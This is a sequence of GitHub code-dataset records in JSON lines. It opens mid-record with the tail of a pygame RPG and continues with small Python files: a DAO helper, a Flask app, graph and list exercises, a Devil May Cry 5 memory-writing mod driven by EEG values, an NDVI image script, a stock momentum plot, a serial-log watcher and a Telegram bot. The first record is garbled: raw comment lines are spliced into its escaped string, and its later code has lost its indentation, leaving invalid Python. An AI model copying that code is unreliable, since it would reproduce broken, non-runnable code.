loop.\"\"\"\n    while not fight_end():\n        # stop as soon as either side is wiped out\n        speed_list = judge_speed()\n        # rebuild the turn order for this round\n        for i in speed_list:\n            if i.cur_health > 0 and not fight_end():\n                if i in characters_fight_list:\n                    if len(enemy_list) > 1:\n                        # randint's upper bound is inclusive, so subtract 1 to avoid an IndexError\n                        character = enemy_list[random.randint(0, len(enemy_list) - 1)]\n                    else:\n                        character = enemy_list[-1]\n                    character_action(i, character)\n                    # only plain attacks are implemented for now\n                    print(character.name + ' health ' + str(character.cur_health))\n                    if character.cur_health <= 0:\n                        character_die(character, enemy_list)\n                        
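                        # A dead enemy leaves both the faction list and this
                        # round's turn order, so it takes no further action.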
speed_list.remove(character)\n                else:\n                    if len(characters_fight_list) > 1:\n                        # pick a random surviving hero; the original indexed with len(enemy_list), which could crash\n                        character = characters_fight_list[random.randint(0, len(characters_fight_list) - 1)]\n                    else:\n                        character = characters_fight_list[-1]\n                    character_action(i, character)\n                    print(character.name + ' health ' + str(character.cur_health))\n                    if character.cur_health <= 0:\n                        character_die(character, characters_fight_list)\n                        speed_list.remove(character)\n\n\ncontent = load_file()\nbaggage = Baggage(content['baggage'])\nis_new(content)\ncharacter_list = []\ndrug_list = []\nmaterial_list = []\nprop_list = []\nmake_lists(content, prop_list, drug_list, character_list, material_list)\nrefresh_baggage(baggage, prop_list, drug_list, material_list)\nmap_choice = [20, height - 20]\nmap_x_velocity = 0\nmap_y_velocity = 0\nflag = 0\npoint_list = [(100, 200), (200, 100), (300, 400), (500, 400)]\nlevel_choice = -1\n\nwhile True:\n    screen.fill(CREAM)\n    for event in pygame.event.get():  # event list\n        if event.type == pygame.QUIT:  # close the window\n            refresh_content(content, character_list, prop_list, drug_list, material_list)\n            down_file(content)\n            sys.exit()\n        elif event.type == pygame.KEYDOWN:  # key press event\n            if event.key == pygame.K_RIGHT:\n                map_x_velocity = 2\n            if event.key == pygame.K_DOWN:\n                map_y_velocity = 2\n            if event.key == pygame.K_LEFT:\n                map_x_velocity = -2\n            if event.key == pygame.K_UP:\n                map_y_velocity = -2\n        elif event.type == pygame.KEYUP:  # key release event\n            if event.key == pygame.K_RIGHT:\n                map_x_velocity = 0\n            if event.key == pygame.K_DOWN:\n                map_y_velocity = 0\n            if event.key == pygame.K_LEFT:\n                map_x_velocity = 0\n            if event.key == pygame.K_UP:\n                map_y_velocity = 0\n            if event.key == pygame.K_SPACE and level_choice != -1:\n                print(int(level_choice))\n                characters_fight_list = character_list[:]\n                enemy_list = []\n                get_cur_ability(level_choice)\n                fight_fight()\n                print(int(level_choice))\n    mouse_pos = pygame.mouse.get_pos()\n    mouse_pressed = pygame.mouse.get_pressed()\n    # get_pressed() returns a tuple: [0] is the left button, [1] the middle, [2] the right\n    if width - 60 < mouse_pos[0] < width and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1:\n        # character panel\n        draw_character()\n        draw_window()\n        while True:\n            if close_window() == 1:\n                break\n    if (width - 120 < mouse_pos[0] < width - 60 and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1)\\\n            or flag == 1:\n        # bag (inventory) panel\n        show_words(\"金钱:\" + str(content['money']), (width / 2, 30), font, BLACK)\n        for i in range(3):\n            pygame.draw.line(screen, BLACK, (100, 200 + i * 150), (width - 100, 200 + i * 150), 4)\n        for i in range(5):\n            pygame.draw.line(screen, BLACK, (250 + i * 150, 50), (250 + i * 150, height - 150), 4)\n        # TODO: factor this grid drawing out into a function\n        props_num = show_object(baggage)\n        draw_window()\n        flag = 0\n        while True:\n            if close_window() == 1:\n                refresh_lists(baggage, prop_list, drug_list, material_list)\n                break\n            mouse_pressed = pygame.mouse.get_pressed()\n            cur_word_1 = ''\n            cur_word_2 = ''\n            tag = 0\n            if mouse_pressed[0] == 1:\n                chose_num = click_on_props()\n                if 0 <= chose_num < props_num:\n                    pygame.draw.rect(screen, CREAM, ((0, height - 145), (1100, 145)))\n                    word_len = 0\n                    obj = vars(baggage.objects[chose_num])\n                    for i in obj:\n                        if not re.findall('(^grow|^need|pos|exp|is_wear|numb)', str(i)):\n                            if obj[i] != 0:\n                                if word_len < 6:\n                                    cur_word_1 += translate(str(i)) + ':' + str(obj[i]) + ' '\n                                    word_len += 1\n                                else:\n                                    cur_word_2 += translate(str(i)) + ':' + str(obj[i]) + ' '\n                    show_words(cur_word_1, (width / 2, height - 120), font, BLACK)\n                    
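                    # Item tool-tip: the first six non-zero fields go on one
                    # line, any remaining fields overflow onto a second line.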
show_words(cur_word_2, (width / 2, height - 70), font, BLACK)\n elif mouse_pressed[2] == 1:\n chose_num = click_on_props()\n if 0 <= chose_num < props_num:\n chose_num = click_on_props()\n if type(baggage.objects[chose_num]) == Material or type(baggage.objects[chose_num]) == Drug:\n sale_obj(baggage, baggage.objects[chose_num], content)\n refresh_lists(baggage, prop_list, drug_list, material_list)\n time.sleep(0.2)\n flag = 1\n break\n else:\n screen.fill(CREAM)\n pygame.draw.line(screen, BLACK, (100, 450), (width - 100, 450), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 3 + 100, 50),\n ((width - 200) / 3 + 100, 650), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 1.5 + 100, 50),\n ((width - 200) / 1.5 + 100, 650), 4)\n show_words(\"售出\", ((width - 200) / 3 - 50, 350), font, BLACK)\n screen.blit(sale_images, sale_image)\n show_words(\"强化\", (width / 2, 350), font, BLACK)\n screen.blit(strengthen_images, strengthen_image)\n show_words(\"附魔\", ((width - 200) / 1.5 + 250, 350), font, BLACK)\n screen.blit(enchant_images, enchant_image)\n show_words(\"装备于\" + str(character_list[0].name), ((width - 200) / 3 - 50, 550), font, BLACK)\n show_words(\"装备于\" + str(character_list[1].name), (width / 2, 550), font, BLACK)\n show_words(\"装备于\" + str(character_list[2].name), ((width - 200) / 1.5 + 250, 550), font, BLACK)\n draw_window()\n while True:\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0] == 1:\n mouse_pos = pygame.mouse.get_pos()\n if 100 < mouse_pos[0] < (width - 200) / 3 + 100 and 50 < mouse_pos[1] < 450:\n sale_obj(baggage, baggage.objects[chose_num], content)\n refresh_lists(baggage, prop_list, drug_list, material_list)\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n tag = 1\n break\n if (width - 200) / 3 + 100 < mouse_pos[0] < (width - 200) / 1.5 + 100 and 50 <\\\n mouse_pos[1] < 450:\n streng_status = strengthen_prop(baggage.objects[chose_num])\n pygame.draw.rect(screen, CREAM, ((0, height - 145), (1100, 145)))\n if streng_status == 1:\n show_words('强化成功!', (width / 2, height - 100), font, RED)\n elif streng_status == 0:\n show_words('强化失败...', (width / 2, height - 100), font, RED)\n elif streng_status == 2:\n show_words('你的装备已经满级了!', (width / 2, height - 100), font, RED)\n elif streng_status == 3:\n show_words('没钱强化个毛啊!需要' + str(baggage.objects[chose_num].need_exp),\n (width / 2, height - 100), font, RED)\n pygame.display.update()\n fclock.tick(fps)\n time.sleep(0.2)\n if 100 < mouse_pos[0] < (width - 200) / 3 + 100 and 450 < mouse_pos[1] < 650:\n add_prop_character(character_list[0], baggage.objects[chose_num], 1)\n tag = 1\n break\n elif (width - 200) / 3 + 100 < mouse_pos[0] < (width - 200) / 1.5 + 100 and 450 \\\n < mouse_pos[1] < 650:\n add_prop_character(character_list[1], baggage.objects[chose_num], 2)\n tag = 1\n break\n elif (width - 200) / 1.5 + 100 < mouse_pos[0] < width - 100 and 450 < mouse_pos[1] < 650:\n add_prop_character(character_list[2], baggage.objects[chose_num], 3)\n tag = 1\n break\n if close_window() == 1:\n break\n if tag == 1:\n flag = 1\n break\n pygame.display.update()\n fclock.tick(fps)\n if width - 180 < mouse_pos[0] < width - 120 and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1:\n \"\"\"achievement\"\"\"\n draw_window()\n while True:\n if close_window() == 1:\n break\n if (map_x_velocity > 0 and map_choice[0] < width - 10) or (map_x_velocity < 0 and map_choice[0] > 10):\n map_choice[0] += map_x_velocity\n if (map_y_velocity > 0 and map_choice[1] < height - 10) or (map_y_velocity < 0 and 
map_choice[1] > 10):\n            map_choice[1] += map_y_velocity\n    pygame.draw.circle(screen, BLACK, tuple(map_choice), 10)\n    screen.blit(character_images, character_image)\n    screen.blit(bag_images, bag_image)\n    screen.blit(achievement_images, achievement_image)\n    draw_map()\n    level_choice = level_choose()\n    pygame.display.update()\n    fclock.tick(fps)\n","repo_name":"DAZHAdazha/No-names-land","sub_path":"无名之地.py","file_name":"无名之地.py","file_ext":"py","file_size_in_byte":40390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2076863614","text":"# Private variables\n\nclass Human:\n\n    # Private (name-mangled) class variable\n    __human = 'human'\n\n    def __init__(self, name, age):\n        self.__name = name\n        self.__age = age\n\n    def print_msg(self):\n        print('name = {},age = {},__human = {}'.format(self.__name, self.__age, self.__human))\n\nhuman = Human('taro', 20)\n# How to forcibly access a private variable (via name mangling)\nprint(human._Human__name)\n\nhuman.print_msg()\n","repo_name":"takicoYuki/pythonDesignPattern","sub_path":"myproject/class/base10.py","file_name":"base10.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74574242011","text":"import inspect\n\n\ndef orm(cursor, dto_type):\n    # the following line retrieves the argument names of the constructor\n    # (getfullargspec replaces getargspec, which was removed in Python 3.11)\n    args = inspect.getfullargspec(dto_type.__init__).args\n\n    # the first argument of the constructor will be 'self'; it does not correspond\n    # to any database field, so we can ignore it.\n    args = args[1:]\n\n    # gets the names of the columns returned in the cursor\n    col_names = [column[0] for column in cursor.description]\n\n    # map them into the position of the corresponding constructor argument\n    col_mapping = [col_names.index(arg) for arg in args]\n    return [row_map(row, col_mapping, dto_type) for row in cursor.fetchall()]\n\n\ndef row_map(row, col_mapping, dto_type):\n    ctor_args = [row[idx] for idx in col_mapping]\n    return dto_type(*ctor_args)\n\n\n# we can use our method above in order to start writing a generic Dao\n# note that this class is not complete and we will add methods to it next\nclass Dao(object):\n    def __init__(self, dto_type, conn):\n        self._conn = conn\n        self._dto_type = dto_type\n\n        # dto_type is a class; its __name__ field contains a string representing the name of the class.\n        self._table_name = dto_type.__name__.lower() + 's'\n\n    def insert(self, dto_instance):\n        ins_dict = vars(dto_instance)\n        column_names = ','.join(ins_dict.keys())\n        params = ins_dict.values()\n        qmarks = ','.join(['?'] * len(ins_dict))\n        stmt = 'INSERT INTO {} ({}) VALUES ({})' \\\n            .format(self._table_name, column_names, qmarks)\n        self._conn.execute(stmt, tuple(params))\n\n    def update(self, dto_instance):\n        ins_dict = vars(dto_instance)\n        # crude primary-key detection: assumes the key column is either 'id' or 'grade'\n        if ins_dict.get('id') is not None:\n            pk = 'id'\n            pkVal = '{}'.format(ins_dict.get(pk))\n        else:\n            pk = 'grade'\n            pkVal = '\\'{}\\''.format(ins_dict.get(pk))\n\n        column_names = '=?,'.join(ins_dict.keys())\n        column_names += '=?'\n        params = ins_dict.values()\n        stmt = 'UPDATE {} SET {} WHERE {} = {}' \\\n            .format(self._table_name, column_names, pk, pkVal)\n        self._conn.execute(stmt, tuple(params))\n\n    # delete\n    def delete(self, keyvals):\n        column_names = keyvals.keys()\n        params = keyvals.values()\n        stmt = 'DELETE FROM {} WHERE {}' \\\n            .format(self._table_name, ' AND '.join([col + '=?' 
for col in column_names]))\n        self._conn.execute(stmt, tuple(params))\n\n    # find all\n    def find_all(self):\n        c = self._conn.cursor()\n        c.execute('SELECT * FROM {}'.format(self._table_name))\n        return orm(c, self._dto_type)\n\n    # find by specific attributes\n    def find(self, **keyvals):\n        column_names = keyvals.keys()\n        params = keyvals.values()\n\n        stmt = 'SELECT * FROM {} WHERE {}' \\\n            .format(self._table_name, ' AND '.join([col + '=?' for col in column_names]))\n\n        c = self._conn.cursor()\n        c.execute(stmt, tuple(params))\n        return orm(c, self._dto_type)\n","repo_name":"y0natancohen/spl4","sub_path":"dbtools.py","file_name":"dbtools.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"37542934491","text":"from flask import Flask, request, jsonify, render_template\nfrom integrator import data_converter\n\napp = Flask(__name__)\n\n@app.route('/main', methods=['POST'])\ndef main():\n    data = request.json\n    input_data = data.get('inputData', {})\n    output_data = data_converter(input_data)\n\n    return jsonify(output_data)\n\n\n@app.route('/')\ndef index():\n    return render_template('main.html')\n\n\n\n\nif __name__ == '__main__':\n    app.run(debug=True, port=5000)","repo_name":"szalecki-a/Krasowskis_calculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28711683313","text":"# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\nclass Solution:\n    def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n        head = ListNode()\n        current = head\n        while l1 or l2:\n            if l1 and l2:\n                if l1.val > l2.val:\n                    current.next = ListNode(l2.val)\n                    current = current.next\n                    l2 = l2.next\n                else:\n                    current.next = ListNode(l1.val)\n                    current = current.next\n                    l1 = l1.next\n            else:\n                c = l1 if l1 else l2\n                current.next = c\n                break\n        return head.next","repo_name":"sbyeol3/Algorithm-Study","sub_path":"LeetCode/Q1-Q500/Q21.py","file_name":"Q21.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"34819903975","text":"# DFS using recursion\ndef recursive_dfs(v, discovered=None):\n    # use None instead of a mutable default argument so repeated calls\n    # do not share (and keep appending to) the same list\n    if discovered is None:\n        discovered = []\n    discovered.append(v)\n\n    for x in graph[v]:\n        if x not in discovered:\n            recursive_dfs(x, discovered)\n\n    return discovered\n\ndef iterative_dfs(v, discovered=None):\n    if discovered is None:\n        discovered = []\n    stack = [v]\n\n    while stack:\n        x = stack.pop()\n        if x not in discovered:\n            discovered.append(x)\n            for value in graph[x]:\n                stack.append(value)\n\n    return discovered\n\ngraph = {\n    1: [2, 3, 4],\n    2: [5],\n    3: [5],\n    4: [],\n    5: [6, 7],\n    6: [],\n    7: [3]\n}\n\nprint(recursive_dfs(1))\nprint(iterative_dfs(1))","repo_name":"Park-min-hyoung/PAI","sub_path":"그래프/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35614368756","text":"from PyQt5 import QtWidgets as qtw\nfrom PyQt5 import QtGui as qtg\nfrom PyQt5 import QtCore as qtc\nfrom PyQt5 import QtChart as qtch\n\nfrom ReadWriteMem import ReadWriteMemory\n\nfrom designer.dmc_mod_from import Ui_DmcEegModForm\n\n\nclass DMCMod(qtw.QMainWindow):\n\n    def __init__(self):\n        super().__init__()\n\n        # Window Initialization\n        self.setWindowTitle('DMC5 EEG Concentration Mod')\n        central_wdg = qtw.QWidget()\n        
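        # The (presumably Qt Designer generated) Ui_DmcEegModForm is laid out
        # on this bare QWidget, which then becomes the main window's central widget.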
self.setCentralWidget(central_wdg)\n self.mod_form = Ui_DmcEegModForm()\n self.mod_form.setupUi(central_wdg)\n self.status = qtw.QStatusBar()\n self.setStatusBar(self.status)\n\n self.is_connected = False\n self.is_injecting = False\n self.current_eeg_concentration = 0.6\n\n # Read Write Memory params\n self.rwm = ReadWriteMemory()\n self.process = None\n self.concentration_ptr = None\n\n # Buttons Trigger\n self.mod_form.connectBtn.clicked.connect(self.connect)\n self.mod_form.setValBtn.clicked.connect(self.form_set_value)\n self.mod_form.startBtn.clicked.connect(self.execute_injection)\n\n self.concentration_update_value = 0\n\n # Timers\n self.value_update_timer = qtc.QTimer()\n self.value_update_timer.timeout.connect(self.update_value)\n self.injection_timer = qtc.QTimer()\n self.injection_timer.timeout.connect(self.inject_value)\n\n def inject_value(self):\n # TODO: check if in combat\n self.write_dmc_concentration(self.concentration_update_value)\n\n def update_value(self):\n print('update dmc5')\n # calculate update value\n dmc_concentration = self.read_dmc_concentration()\n update_value = self.current_eeg_concentration - self.mod_form.thrSpinBox.value()\n if update_value > 0:\n update_value *= self.mod_form.addSpinBox.value()\n else:\n update_value *= self.mod_form.subSpinBox.value()\n\n next_concentration_value = dmc_concentration + update_value\n if next_concentration_value > 300:\n next_concentration_value = 300\n elif next_concentration_value < 0:\n next_concentration_value = 0\n\n # update status values\n self.mod_form.concentrationLabel.setText(str(self.current_eeg_concentration))\n self.mod_form.updateLabel.setText(str(update_value))\n self.mod_form.gameLabel.setText(str(dmc_concentration))\n self.mod_form.nextGameLabel.setText(str(next_concentration_value))\n\n # update game value\n self.concentration_update_value = next_concentration_value\n\n\n def execute_injection(self):\n if not self.is_connected:\n print('not connected to game')\n return\n if not self.is_injecting:\n print('start inject')\n update_interval = self.mod_form.valUpdateIntervalSpinBox.value()\n inject_interval = self.mod_form.injectIntervalSpinBox.value()\n self.value_update_timer.start(update_interval)\n self.injection_timer.start(inject_interval)\n self.mod_form.startBtn.setText('Stop Injection')\n self.mod_form.connectBtn.setDisabled(True)\n self.is_injecting = True\n else:\n self.value_update_timer.stop()\n self.injection_timer.stop()\n self.mod_form.connectBtn.setDisabled(False)\n self.mod_form.startBtn.setText('Start Injection')\n self.is_injecting = False\n\n def form_set_value(self):\n val = self.mod_form.valSpinBox.value()\n self.concentration_update_value = val\n if self.is_connected:\n self.write_dmc_concentration(val)\n # update status values\n self.mod_form.concentrationLabel.setText(str(self.current_eeg_concentration))\n self.mod_form.updateLabel.setText(str(0))\n self.mod_form.gameLabel.setText(str(val))\n self.mod_form.nextGameLabel.setText(str(val))\n\n # Base Methods\n def connect(self):\n if not self.is_connected:\n self.process = self.rwm.get_process_by_name('DevilMayCry5.exe')\n self.process.open()\n\n # Get concentration pointer\n base_offset = 0X7E61B90\n module_addr = int(str(self.process.base_addr), 0) + int(str(base_offset), 0)\n self.concentration_ptr = self.process.get_pointer(lp_base_address=module_addr, offsets=[0x78, 0x1B50])\n\n # TODO: Get in combat ptr\n self.is_connected = True\n self.mod_form.connectBtn.setText('Disconnect')\n print('connection to dmc5')\n else:\n 
self.process.close()\n            self.is_connected = False\n            self.mod_form.connectBtn.setText('Connect')\n            print('disconnect from dmc5')\n\n    def read_dmc_concentration(self):\n        con_val = self.process.read_float(self.concentration_ptr)\n        print('Read concentration:', con_val)\n        return con_val\n\n    def write_dmc_concentration(self, val):\n        state = self.process.write(self.concentration_ptr, val)\n        print('write concentration state:', state)\n\n    def closeEvent(self, event):\n        if self.is_connected:\n            self.process.close()\n            self.is_connected = False\n","repo_name":"aryanakr/open-sourece-python-EEG-handling-software","sub_path":"dmc_mod.py","file_name":"dmc_mod.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8168599952","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 20 10:37:45 2021\r\n\r\n@author: cosmi\r\n\"\"\"\r\n\r\n\"\"\"\r\nDenoised Vegetation Index Mapping program using DJI Mavic 2 Pro\r\nJPEG 16-bit combo images taken using InfraBlue Filter\r\n%(c)-J. Campbell MuonRay Enterprises 2021\r\n% creative commons For non-profit use only\r\nThis Python script was created using the Spyder Editor\r\n\"\"\"\r\n\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\nfrom PIL import Image\r\nimport pylab\r\nimport rof\r\n\r\nimport imageio\r\nimport numpy as np\r\n\r\n#!/usr/bin/python\r\nimport os\r\nimport getopt\r\nimport sys\r\n\r\nimport matplotlib.pyplot as plt  # For image viewing\r\nfrom matplotlib import colors\r\nfrom matplotlib import ticker\r\nfrom matplotlib.colors import LinearSegmentedColormap\r\n\r\n\r\n\r\n# a nice selection of grayscale colour palettes\r\ncols1 = ['blue', 'green', 'yellow', 'red']\r\ncols2 = ['gray', 'gray', 'red', 'yellow', 'green']\r\ncols3 = ['gray', 'blue', 'green', 'yellow', 'red']\r\n\r\ncols4 = ['black', 'gray', 'blue', 'green', 'yellow', 'red']\r\n\r\ndef create_colormap(args):\r\n    return LinearSegmentedColormap.from_list(name='custom1', colors=cols3)\r\n\r\n# colour bar to match grayscale units\r\ndef create_colorbar(fig, image):\r\n    position = fig.add_axes([0.125, 0.19, 0.2, 0.05])\r\n    norm = colors.Normalize(vmin=-1., vmax=1.)\r\n    cbar = plt.colorbar(image,\r\n                        cax=position,\r\n                        orientation='horizontal',\r\n                        norm=norm)\r\n    cbar.ax.tick_params(labelsize=6)\r\n    tick_locator = ticker.MaxNLocator(nbins=3)\r\n    cbar.locator = tick_locator\r\n    cbar.update_ticks()\r\n    cbar.set_label(\"NDVI\", fontsize=10, x=0.5, y=0.5, labelpad=-25)\r\n\r\n\r\n\r\nfor infile in os.listdir(\"./\"):\r\n    print(\"file : \" + infile)\r\n    if infile[-3:] == \"jpg\" or infile[-3:] == \"JPG\":\r\n        # print \"is tif or DNG (RAW)\"\r\n        # NOTE: for .jpg inputs this keeps the same name, so the source image\r\n        # is overwritten by the rendered NDVI map saved below.\r\n        outfile = infile[:-3] + \"jpg\"\r\n        rgb = imageio.imread(infile)  # scipy.misc.imread was removed from SciPy; imageio provides imread\r\n        \r\n        \r\n        print(\"new filename : \" + outfile)\r\n        # Extract the Red, Green and Blue channels\r\n        \r\n\r\n        R = rgb[:,:,0]\r\n        G = rgb[:,:,1]\r\n        B = rgb[:,:,2]\r\n        \r\n        # Use the red band as the near-infrared channel\r\n#NIR = image[:, :, 0]\r\n#ir = np.asarray(NIR, float)\r\n        \r\n        ir = (R).astype('float')\r\n        \r\n# Get one of the IR image bands (all bands should be same)\r\n#blue = image[:, :, 2]\r\n\r\n#r = np.asarray(blue, float)\r\n        \r\n        r = (B).astype('float')\r\n        \r\n        # denoise\r\n        \r\n        denoised_ir_channel = ir\r\n        \r\n        \r\n        U, T = rof.denoise(denoised_ir_channel, denoised_ir_channel)\r\n        \r\n        #pylab.figure()\r\n        #pylab.gray()\r\n        #pylab.imshow(U)\r\n        
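        # (Optional pylab preview of the ROF-denoised channel, left commented
        # out; the denoised array U feeds the NDVI computation below.)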
#pylab.axis('equal')\r\n #pylab.axis('off')\r\n #pylab.show()\r\n\r\n\r\n# Create a numpy matrix of zeros to hold the calculated NDVI values for each pixel\r\n # The NDVI image will be the same size as the input image\r\n\r\n \r\n ndvi = np.zeros(r.size) \r\n \r\n# Calculate NDVI\r\n \r\n \r\n ndvi = np.true_divide(np.subtract(U, r), np.add(U, r))\r\n fig, ax = plt.subplots()\r\n\r\n image = ax.imshow(ndvi, cmap=create_colormap(colors))\r\n plt.axis('off')\r\n #Lock or Unlock Key Bar Here for Mapping/Sampling/Showcasing:\r\n #create_colorbar(fig, image)\r\n extent = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())\r\n #imageio.imsave(outfile, ndvi)\r\n fig.savefig(outfile, dpi=600, transparent=True, bbox_inches=extent, pad_inches=0)\r\n\r\n # plt.show()\r\n \r\n \r\n# rgb = raw.postprocess()\r\n\r\n # plt.show()","repo_name":"MuonRay/Image_Denoising_with_ROF_algorithm","sub_path":"ndvi_denoise_batch.py","file_name":"ndvi_denoise_batch.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"24379849888","text":"## Momentum indicator compares current price with previous \n# price from selected number of periods ago.\n\n#%%\nimport pandas as pd\nfrom pandas_datareader import data\nimport matplotlib.pyplot as plt\n\n\nstart_date = '2014-01-01'\nend_date = '2018-01-01'\n\nSRC_DATA_FILENAME = 'goog_data.pkl'\n\ntry:\n goog_data2 = pd.read_pickle(SRC_DATA_FILENAME)\nexcept FileNotFoundError:\n goog_data2 = data.DataReader('GOOG', start_date, end_date)\n goog_data2.to_pickle(SRC_DATA_FILENAME)\n\ngoog_data = goog_data2.tail(620) \nclose = goog_data['Close']\n\ntime_period = 20\nhistory = []\nmom_values = []\n\nfor close_price in close:\n history.append(close_price)\n if len(history) > time_period:\n del (history[0])\n \n mom = close_price - history[0]\n mom_values.append(mom)\n \ngoog_data = goog_data.assign(ClosePrice=pd.Series(close, index=goog_data.index))\ngoog_data = goog_data.assign(MomentumFromPrice20DaysAgo=pd.Series(mom_values, index=goog_data.index))\n\nclose_price = goog_data['ClosePrice']\nmom = goog_data['MomentumFromPrice20DaysAgo']\n\nfig = plt.figure()\nax1 = fig.add_subplot(211, ylabel='Google price in $')\nclose_price.plot(ax=ax1, color='g', lw=2, legend=True)\nax2 = fig.add_subplot(212, ylabel='Momentum in $')\nmom.plot(ax=ax2, color='b', lw=2, legend=True)\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# %%\n","repo_name":"agbleze/python_algotrade","sub_path":"mom.py","file_name":"mom.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42243747327","text":"#!/usr/bin/python2\n\nimport sys\nimport argparse\nimport pexpect\nimport select\nimport re\nimport smtplib\nimport os\nimport time\nimport smtp_credentials\n\nfrom email.mime.text import MIMEText\n\n#FIXME: Known bug: last line not seen\n\nparser = argparse.ArgumentParser(description='Log parser')\n\nparser.add_argument('FILE', help='path to the log to parse')\nparser.add_argument('RELAY', type=int, help=\"relay port associated to the board whose log is being parsed\")\nparser.add_argument('RELAY_IP', help=\"IP address of the relays\")\nparser.add_argument('RELAY_PORT', type=int, help=\"port of the relays\")\n\nargs = parser.parse_args()\n\npower_cmd = \"command_relay.py %s %d %d\" % (args.RELAY_IP, args.RELAY_PORT, args.RELAY)\n\n\nrecipients = smtp_credentials.recipients\nme = smtp_credentials.mail\n\ndef 
send_mail(status, filename, line=\"\", reboot=False):\n\tcontent = \"%s occurred on device %s:\\n%s\" % (status, filename, line)\n\tif reboot:\n\t\tcontent += \"\\nThe device is being rebooted.\"\n\tmsg = MIMEText(content)\n\tmsg['Subject'] = \"%s on device %s\" % (status, filename)\n\tmsg['To'] = \", \".join(recipients)\n\tmsg['From'] = me\n\tserver = smtplib.SMTP(smtp_credentials.server, smtp_credentials.port)\n\tserver.ehlo()\n\tserver.starttls()\n\tserver.login(smtp_credentials.login, smtp_credentials.password)\n\tserver.sendmail(me, recipients, msg.as_string())\n\tserver.quit()\n\ndef reboot_board():\n\tos.spawnvp(os.P_WAIT, 'command_relay.py', (power_cmd + \" off\").split())\n\ttime.sleep(5)\n\tos.spawnvp(os.P_WAIT, 'command_relay.py', (power_cmd + \" on\").split())\n\ndef timeout_detected(filename):\n\tif time.mktime(time.gmtime()) >= freeze_timeout + last_line:\n\t\tsend_mail(\"timeout of %ds\" % freeze_timeout, filename, reboot=True)\n\t\treboot_board()\n\n# Timeout in milliseconds before serial is considered frozen\ntimeout = 60 * 1000 * 10\n\n# Timeout in seconds before board is declared crashed\nfreeze_timeout = 60 * 30\nlast_line = time.mktime(time.gmtime())\nfirst_err = True\n\nboard_rebooted_re = re.compile('Hit any key to stop autoboot')\nreboot_templates = ['send stop command failed', 'Oops']\nmatching_templates = ['UBI.*err']\nmatching_res = []\nreboot_res = []\nfor matching_template in matching_templates:\n\tmatching_res.append(re.compile(matching_template))\n\nfor reboot_template in reboot_templates:\n\treboot_res.append(re.compile(reboot_template))\n\nserial = pexpect.spawn(\"tail -F %s\" % args.FILE, timeout=freeze_timeout)\npoll = select.poll()\npoll.register(serial, select.POLLIN)\n\nwhile True:\n\tpoll_ok = poll.poll(timeout)\n\tif not poll_ok:\n\t\ttimeout_detected(args.FILE)\n\t\tcontinue\n\n\ttry:\n\t\tline = serial.readline()\n\texcept pexpect.TIMEOUT:\n\t\ttimeout_detected(args.FILE)\n\t\tcontinue\n\n\tlast_line = time.mktime(time.gmtime())\n\tif board_rebooted_re.search(line):\n\t\tfirst_err = True\n\tmatch = None  # guard against an empty template list\n\tfor matching_re in matching_res:\n\t\tmatch = matching_re.search(line)\n\t\tif match:\n\t\t\tif first_err:\n\t\t\t\tsend_mail(\"error\", args.FILE, line)\n\t\t\tfirst_err = False\n\t\t\tbreak\n\tif match:\n\t\tcontinue\n\tfor reboot_re in reboot_res:\n\t\tmatch = reboot_re.search(line)\n\t\tif match:\n\t\t\tif first_err:\n\t\t\t\tsend_mail(\"error\", args.FILE, line, True)\n\t\t\t\treboot_board()\n\t\t\tfirst_err = False\n\t\t\tbreak\n\n\nsys.exit(0)\n","repo_name":"bbrezillon/ntc-test-automation","sub_path":"log_parser.py","file_name":"log_parser.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12371603899","text":"import logging\nimport os\n\nfrom vars import var\n\nfrom pyrogram import Client, idle\n\n\n\nlogging.getLogger(\"pyrogram\").setLevel(logging.INFO)\n\nTgraph = Client(\n    \"Telegra.ph Uploader\",\n    api_id=var.API_ID,\n    api_hash=var.API_HASH,\n    bot_token=var.BOT_TOKEN,\n    plugins=dict(root=\"plugins\"),\n)\n\n\n\n\nTgraph.start()\nuname = (Tgraph.get_me()).username\nprint(f\"@{uname} Deployed Successfully!\")\n\nidle()\n\n\n\n","repo_name":"Captainamarica/NightVission-Telegrapbot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
